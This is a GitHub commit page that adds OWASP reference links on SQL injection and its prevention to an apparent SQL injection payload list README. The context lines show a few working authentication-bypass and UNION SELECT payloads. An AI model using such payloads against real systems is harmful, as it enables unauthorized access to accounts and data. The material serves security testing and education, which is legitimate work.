Skip to content

Commit 361ed31

Browse files
author
İsmail Taşdelen
authored
Update README.md
1 parent aedc248 commit 361ed31

File tree

1 file changed

+38
-0
lines changed

1 file changed

+38
-0
lines changed

β€ŽREADME.md

+38
Original file line numberDiff line numberDiff line change
@@ -882,3 +882,41 @@ admin") or "1"="1"#
882882
admin") or "1"="1"/*
883883
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
884884
```
885+
886+
References :
887+
888+
* SQL Injection ( OWASP )
889+
890+
πŸ‘‰ https://www.owasp.org/index.php/SQL_Injection
891+
892+
* Blind SQL Injection
893+
894+
πŸ‘‰ https://www.owasp.org/index.php/Blind_SQL_Injection
895+
896+
* Testing for SQL Injection (OTG-INPVAL-005)
897+
898+
πŸ‘‰ https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005)
899+
900+
* SQL Injection Bypassing WAF
901+
902+
πŸ‘‰ https://www.owasp.org/index.php/SQL_Injection_Bypassing_WAF
903+
904+
* Reviewing Code for SQL Injection
905+
906+
πŸ‘‰ https://www.owasp.org/index.php/Reviewing_Code_for_SQL_Injection
907+
908+
* PL/SQL:SQL Injection
909+
910+
πŸ‘‰ https://www.owasp.org/index.php/PL/SQL:SQL_Injection
911+
912+
* Testing for NoSQL injection
913+
914+
πŸ‘‰ https://www.owasp.org/index.php/Testing_for_NoSQL_injection
915+
916+
* SQL Injection Injection Prevention Cheat Sheet
917+
918+
πŸ‘‰ https://cheatsheetseries.owasp.org/cheatsheets/Injection_Prevention_Cheat_Sheet.html
919+
920+
* SQL Injection Query Parameterization Cheat Sheet
921+
922+
πŸ‘‰ https://cheatsheetseries.owasp.org/cheatsheets/Query_Parameterization_Cheat_Sheet.html

0 commit comments

Comments
Β (0)